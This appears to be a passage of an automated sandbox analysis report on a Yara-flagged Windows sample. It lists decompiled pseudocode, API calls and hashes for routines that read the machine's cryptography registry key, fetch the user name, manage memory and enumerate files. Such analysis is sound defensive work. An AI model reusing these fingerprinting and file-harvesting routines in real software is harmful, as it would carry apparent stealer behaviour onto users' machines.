                                                                                                                                                                                              				_push(E00406E66);
                                                                                                                                                                                              				return E00403B98( &_v12, 2);
                                                                                                                                                                                              			}













                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFreeOpenQueryValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 967375698-0
                                                                                                                                                                                              • Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                                                                                                                                              • Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00401388(void* __eax, void** __edx) {
                                                                                                                                                                                              				void* _t3;
                                                                                                                                                                                              				void** _t8;
                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                              				long _t14;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t8 = __edx;
                                                                                                                                                                                              				if(__eax >= 0x100000) {
                                                                                                                                                                                              					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t14 = 0x100000;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t8[1] = _t14;
                                                                                                                                                                                              				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                                                                                                                                              				_t11 = _t3;
                                                                                                                                                                                              				 *_t8 = _t11;
                                                                                                                                                                                              				if(_t11 != 0) {
                                                                                                                                                                                              					_t3 = E0040123C(0x41c5d4, _t8);
                                                                                                                                                                                              					if(_t3 == 0) {
                                                                                                                                                                                              						VirtualFree( *_t8, 0, 0x8000);
                                                                                                                                                                                              						 *_t8 = 0;
                                                                                                                                                                                              						return 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t3;
                                                                                                                                                                                              			}








                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                              • Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                                                                                                                                                                              • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                                                                                                                                                                                              • Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E004065C4(intOrPtr* __eax) {
                                                                                                                                                                                              				short _v516;
                                                                                                                                                                                              				signed int _t4;
                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                              				int _t9;
                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                              				DWORD* _t19;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t4 = __eax +  *__eax;
                                                                                                                                                                                              				 *_t4 =  *_t4 + _t4;
                                                                                                                                                                                              				_t5 = _t4 | 0x5300000a;
                                                                                                                                                                                              				_t19 = _t18 + 0xfffffdfc;
                                                                                                                                                                                              				_t14 = _t5;
                                                                                                                                                                                              				 *_t19 = 0xff;
                                                                                                                                                                                              				_t9 = GetUserNameW( &_v516, _t19); // executed
                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                              					_t11 = E00403B80(_t14);
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t11 = E00403D10(_t14, 0x100,  &_v516);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t11;
                                                                                                                                                                                              			}












                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                                              • Opcode ID: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                                                                                                                                                                                              • Instruction ID: cd992ebe0347ba42bda0945abe6e894bfe88d76707d831bffa21c0f3d5584e5e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 29E04FB12082425FD312EB98D880AA677E59F89300F05487AA885C72E1EE35DE649B57
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E004065C8(signed int __eax) {
                                                                                                                                                                                              				short _v516;
                                                                                                                                                                                              				signed int _t4;
                                                                                                                                                                                              				int _t8;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              				DWORD* _t18;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t4 = __eax | 0x5300000a;
                                                                                                                                                                                              				_t18 = _t17 + 0xfffffdfc;
                                                                                                                                                                                              				_t13 = _t4;
                                                                                                                                                                                              				 *_t18 = 0xff;
                                                                                                                                                                                              				_t8 = GetUserNameW( &_v516, _t18); // executed
                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                              					_t10 = E00403B80(_t13);
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t10 = E00403D10(_t13, 0x100,  &_v516);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t10;
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                                              • Opcode ID: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                                                                                                                                                                                              • Instruction ID: 47af1fdf1995f1dddaec203f3ca82799803cb6e69f4b63bfcad29cffb6660ea3
                                                                                                                                                                                              • Opcode Fuzzy Hash: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                                                                                                                                                                                              • Instruction Fuzzy Hash: D9E08CB12042025BE310EA98D880AA6B2D89F88300F01483AB889C73D0FE39DE648A57
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
                                                                                                                                                                                              				int _t4;
                                                                                                                                                                                              				int _t5;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t4 =  *0x41c5a8; // 0x3
                                                                                                                                                                                              				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
                                                                                                                                                                                              				return _t5;
                                                                                                                                                                                              			}






                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                                                                              • Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                                                                                                                                                                              • Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00401464(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				intOrPtr* _v32;
                                                                                                                                                                                              				intOrPtr* _t24;
                                                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                              				int _t32;
                                                                                                                                                                                              				intOrPtr* _t35;
                                                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                              				void* _t44;
                                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t45 =  &_v20;
                                                                                                                                                                                              				_v32 = __ecx;
                                                                                                                                                                                              				 *_t45 = __edx;
                                                                                                                                                                                              				_v28 = 0xffffffff;
                                                                                                                                                                                              				_v24 = 0;
                                                                                                                                                                                              				_t44 = __eax;
                                                                                                                                                                                              				_v20 =  *_t45 + __eax;
                                                                                                                                                                                              				_t35 =  *0x41c5d4; // 0x41c5d4
                                                                                                                                                                                              				while(_t35 != 0x41c5d4) {
                                                                                                                                                                                              					_t42 =  *_t35;
                                                                                                                                                                                              					_t5 = _t35 + 8; // 0x0
                                                                                                                                                                                              					_t43 =  *_t5;
                                                                                                                                                                                              					if(_t44 <= _t43) {
                                                                                                                                                                                              						_t6 = _t35 + 0xc; // 0x0
                                                                                                                                                                                              						if(_t43 +  *_t6 <= _v20) {
                                                                                                                                                                                              							if(_t43 < _v28) {
                                                                                                                                                                                              								_v28 = _t43;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t10 = _t35 + 0xc; // 0x0
                                                                                                                                                                                              							_t31 = _t43 +  *_t10;
                                                                                                                                                                                              							if(_t31 > _v24) {
                                                                                                                                                                                              								_v24 = _t31;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t32 = VirtualFree(_t43, 0, 0x8000); // executed
                                                                                                                                                                                              							if(_t32 == 0) {
                                                                                                                                                                                              								 *0x41c5b0 = 1;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							E0040126C(_t35);
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t35 = _t42;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t24 = _v32;
                                                                                                                                                                                              				 *_t24 = 0;
                                                                                                                                                                                              				if(_v24 == 0) {
                                                                                                                                                                                              					return _t24;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *_v32 = _v28;
                                                                                                                                                                                              				_t27 = _v24 - _v28;
                                                                                                                                                                                              				 *((intOrPtr*)(_v32 + 4)) = _t27;
                                                                                                                                                                                              				return _t27;
                                                                                                                                                                                              			}

















                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                              • Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                                                                                                                                              • Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				void** _v24;
                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                              				void** _t16;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                              				intOrPtr* _t29;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				intOrPtr* _t32;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v24 = __ecx;
                                                                                                                                                                                              				 *_t32 = __edx;
                                                                                                                                                                                              				_t31 = __eax & 0xfffff000;
                                                                                                                                                                                              				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                                                                                                                                              				 *_v24 = _t31;
                                                                                                                                                                                              				_t15 = _v20 - _t31;
                                                                                                                                                                                              				_v24[1] = _t15;
                                                                                                                                                                                              				_t29 =  *0x41c5d4; // 0x41c5d4
                                                                                                                                                                                              				while(_t29 != 0x41c5d4) {
                                                                                                                                                                                              					_t7 = _t29 + 8; // 0x0
                                                                                                                                                                                              					_t17 =  *_t7;
                                                                                                                                                                                              					_t8 = _t29 + 0xc; // 0x0
                                                                                                                                                                                              					_t27 =  *_t8 + _t17;
                                                                                                                                                                                              					if(_t31 > _t17) {
                                                                                                                                                                                              						_t17 = _t31;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t27 > _v20) {
                                                                                                                                                                                              						_t27 = _v20;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t27 > _t17) {
                                                                                                                                                                                              						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                                                                                                                                              						if(_t15 == 0) {
                                                                                                                                                                                              							_t16 = _v24;
                                                                                                                                                                                              							 *_t16 = 0;
                                                                                                                                                                                              							return _t16;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t29 =  *_t29;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t15;
                                                                                                                                                                                              			}












                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401589
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                              • Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                                                                                                                                              • Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                              			E004015B0(void* __eax, void** __ecx, void* __edx) {
                                                                                                                                                                                              				int _t7;
                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                              				intOrPtr* _t19;
                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                              				void** _t23;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				 *_t23 = __eax + 0x00000fff & 0xfffff000;
                                                                                                                                                                                              				_t22 = __eax + __edx & 0xfffff000;
                                                                                                                                                                                              				 *__ecx =  *_t23;
                                                                                                                                                                                              				_t7 = _t22 -  *_t23;
                                                                                                                                                                                              				__ecx[1] = _t7;
                                                                                                                                                                                              				_t19 =  *0x41c5d4; // 0x41c5d4
                                                                                                                                                                                              				while(_t19 != 0x41c5d4) {
                                                                                                                                                                                              					_t2 = _t19 + 8; // 0x0
                                                                                                                                                                                              					_t9 =  *_t2;
                                                                                                                                                                                              					_t3 = _t19 + 0xc; // 0x0
                                                                                                                                                                                              					_t14 =  *_t3 + _t9;
                                                                                                                                                                                              					if(_t9 <  *_t23) {
                                                                                                                                                                                              						_t9 =  *_t23;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t22 < _t14) {
                                                                                                                                                                                              						_t14 = _t22;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t14 > _t9) {
                                                                                                                                                                                              						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
                                                                                                                                                                                              						if(_t7 == 0) {
                                                                                                                                                                                              							 *0x41c5b0 = 2;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t19 =  *_t19;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                              			}









                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                              • Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                                                                                                                                                                                              • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                                                                                                                                                                                              • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E00414408(char __eax, int __ebx, void* __ecx, char __edx, void* __edi, signed int __esi, char _a4, char _a8, char _a12, intOrPtr _a16, char _a20) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v53;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				struct _WIN32_FIND_DATAW _v648;
                                                                                                                                                                                              				char _v652;
                                                                                                                                                                                              				char _v656;
                                                                                                                                                                                              				char _v660;
                                                                                                                                                                                              				char _v664;
                                                                                                                                                                                              				char _v668;
                                                                                                                                                                                              				char _v672;
                                                                                                                                                                                              				intOrPtr _v676;
                                                                                                                                                                                              				char _v680;
                                                                                                                                                                                              				char _v684;
                                                                                                                                                                                              				char _v688;
                                                                                                                                                                                              				char _v692;
                                                                                                                                                                                              				char _v696;
                                                                                                                                                                                              				intOrPtr _v700;
                                                                                                                                                                                              				char _v704;
                                                                                                                                                                                              				char _v708;
                                                                                                                                                                                              				char _v712;
                                                                                                                                                                                              				char _v716;
                                                                                                                                                                                              				char _v720;
                                                                                                                                                                                              				char _v724;
                                                                                                                                                                                              				char _v728;
                                                                                                                                                                                              				char _v732;
                                                                                                                                                                                              				char _v736;
                                                                                                                                                                                              				char _v740;
                                                                                                                                                                                              				char _v744;
                                                                                                                                                                                              				intOrPtr _v748;
                                                                                                                                                                                              				char _v752;
                                                                                                                                                                                              				char _v756;
                                                                                                                                                                                              				char _v760;
                                                                                                                                                                                              				char _v764;
                                                                                                                                                                                              				char _v768;
                                                                                                                                                                                              				char _v772;
                                                                                                                                                                                              				char _v776;
                                                                                                                                                                                              				char _v780;
                                                                                                                                                                                              				char _v784;
                                                                                                                                                                                              				char _v788;
                                                                                                                                                                                              				char _v792;
                                                                                                                                                                                              				void* _t239;
                                                                                                                                                                                              				void* _t295;
                                                                                                                                                                                              				intOrPtr* _t299;
                                                                                                                                                                                              				void* _t301;
                                                                                                                                                                                              				int _t312;
                                                                                                                                                                                              				int _t333;
                                                                                                                                                                                              				signed int _t343;
                                                                                                                                                                                              				long _t349;
                                                                                                                                                                                              				int _t354;
                                                                                                                                                                                              				int _t377;
                                                                                                                                                                                              				int _t383;
                                                                                                                                                                                              				void* _t387;
                                                                                                                                                                                              				intOrPtr* _t425;
                                                                                                                                                                                              				intOrPtr _t428;
                                                                                                                                                                                              				intOrPtr* _t456;
                                                                                                                                                                                              				int _t460;
                                                                                                                                                                                              				intOrPtr _t464;
                                                                                                                                                                                              				intOrPtr* _t471;
                                                                                                                                                                                              				intOrPtr _t486;
                                                                                                                                                                                              				intOrPtr _t496;
                                                                                                                                                                                              				intOrPtr _t497;
                                                                                                                                                                                              				intOrPtr _t499;
                                                                                                                                                                                              				void* _t534;
                                                                                                                                                                                              				void* _t556;
                                                                                                                                                                                              				void* _t570;
                                                                                                                                                                                              				void* _t573;
                                                                                                                                                                                              				signed int _t575;
                                                                                                                                                                                              				intOrPtr _t577;
                                                                                                                                                                                              				intOrPtr _t578;
                                                                                                                                                                                              				intOrPtr* _t579;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t574 = __esi;
                                                                                                                                                                                              				_t458 = __ebx;
                                                                                                                                                                                              				_t577 = _t578;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t464 = 0x62;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t464 = _t464 - 1;
                                                                                                                                                                                              					_t580 = _t464;
                                                                                                                                                                                              				} while (_t464 != 0);
                                                                                                                                                                                              				_t1 =  &_v8;
                                                                                                                                                                                              				 *_t1 = _t464;
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v16 =  *_t1;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E004040F4( &_v12);
                                                                                                                                                                                              				E004040F4( &_v16);
                                                                                                                                                                                              				E004040F4( &_a20);
                                                                                                                                                                                              				_push(_t577);
                                                                                                                                                                                              				_push(0x414c0d);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t578;
                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                              				E004062D8(_v8,  &_v652, _t580);
                                                                                                                                                                                              				E00403BE0( &_v8, _v652);
                                                                                                                                                                                              				E0040377C( &_v656, _a20);
                                                                                                                                                                                              				E0040795C(0x414c2c,  &_v52, _v656, _t580);
                                                                                                                                                                                              				E0040377C( &_v660, _v12);
                                                                                                                                                                                              				E0040795C(0x414c38,  &_v44, _v660, _t580);
                                                                                                                                                                                              				_t239 = E004045EC(_v44);
                                                                                                                                                                                              				_t581 = _t239;
                                                                                                                                                                                              				if(_t239 == 0) {
                                                                                                                                                                                              					L46:
                                                                                                                                                                                              					_pop(_t486);
                                                                                                                                                                                              					 *[fs:eax] = _t486;
                                                                                                                                                                                              					_push(E00414C17);
                                                                                                                                                                                              					E00403B98( &_v792, 2);
                                                                                                                                                                                              					E00403508( &_v784, 2);
                                                                                                                                                                                              					E00403B80( &_v776);
                                                                                                                                                                                              					E00403508( &_v772, 2);
                                                                                                                                                                                              					E00403B98( &_v764, 6);
                                                                                                                                                                                              					E004034E4( &_v740);
                                                                                                                                                                                              					E00403B98( &_v736, 5);
                                                                                                                                                                                              					E00403508( &_v716, 3);
                                                                                                                                                                                              					E00403B98( &_v704, 3);
                                                                                                                                                                                              					E004034E4( &_v692);
                                                                                                                                                                                              					E00403B80( &_v688);
                                                                                                                                                                                              					E004034E4( &_v684);
                                                                                                                                                                                              					E00403B98( &_v680, 5);
                                                                                                                                                                                              					E00403508( &_v660, 2);
                                                                                                                                                                                              					E00403B80( &_v652);
                                                                                                                                                                                              					_t496 =  *0x405f2c; // 0x405f30
                                                                                                                                                                                              					E004047B4( &_v52, _t496);
                                                                                                                                                                                              					E00403B80( &_v48);
                                                                                                                                                                                              					_t497 =  *0x405f2c; // 0x405f30
                                                                                                                                                                                              					E004047B4( &_v44, _t497);
                                                                                                                                                                                              					E00403B98( &_v40, 4);
                                                                                                                                                                                              					_t499 =  *0x4143e4; // 0x4143e8
                                                                                                                                                                                              					E004047B4( &_v24, _t499);
                                                                                                                                                                                              					E00403B98( &_v16, 3);
                                                                                                                                                                                              					_t214 =  &_a20; // 0x414c4c
                                                                                                                                                                                              					return E00403B80(_t214);
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_push(E004045EC(_v24) + 1);
                                                                                                                                                                                              					E004047A8();
                                                                                                                                                                                              					_t579 = _t578 + 4;
                                                                                                                                                                                              					_push(_v24 + E004045EC(_v24) * 4 - 4);
                                                                                                                                                                                              					E0040781C(_v8, __ebx,  &_v664, _t581);
                                                                                                                                                                                              					_pop(_t295);
                                                                                                                                                                                              					E00403BBC(_t295, _v664);
                                                                                                                                                                                              					while(E004045EC(_v24) > 0) {
                                                                                                                                                                                              						_t299 =  *0x41b594; // 0x41c828
                                                                                                                                                                                              						_t34 = _t299 + 4; // 0x0
                                                                                                                                                                                              						_t301 =  *_t299 - 0x4b000;
						asm("sbb edx, 0x0");
						_t471 =  *0x41b63c; // 0x41c820
						_t35 = _t471 + 4; // 0x0
						__eflags =  *_t34 -  *_t35;
						if(__eflags != 0) {
							if(__eflags <= 0) {
								goto L46;
							}
							L8:
							E0040781C( *((intOrPtr*)(_v24 + E004045EC(_v24) * 4 - 4)), _t458,  &_v28, __eflags);
							E00403B80(_v24 + E004045EC(_v24) * 4 - 4);
							_t312 = E004045EC(_v24) - 1;
							__eflags = _t312;
							_push(_t312);
							E004047A8();
							_t579 = _t579 + 4;
							E00403DB8( &_v672, 0x414c40, _v28, __eflags);
							E0040781C(_v672, _t458,  &_v668, __eflags);
							_t573 = FindFirstFileW(E00403D3C(_v668),  &_v648);
							do {
								_push(_v28);
								_push(0x414c4c);
								_t474 = 0x104;
								E00403D10( &_v680, 0x104,  &(_v648.cFileName));
								_push(_v680);
								E00403E1C();
								E0040781C(_v676, _t458,  &_v32, __eflags);
								E0040770C(_v32, _t458, 0x104,  &_v36, _t574, __eflags);
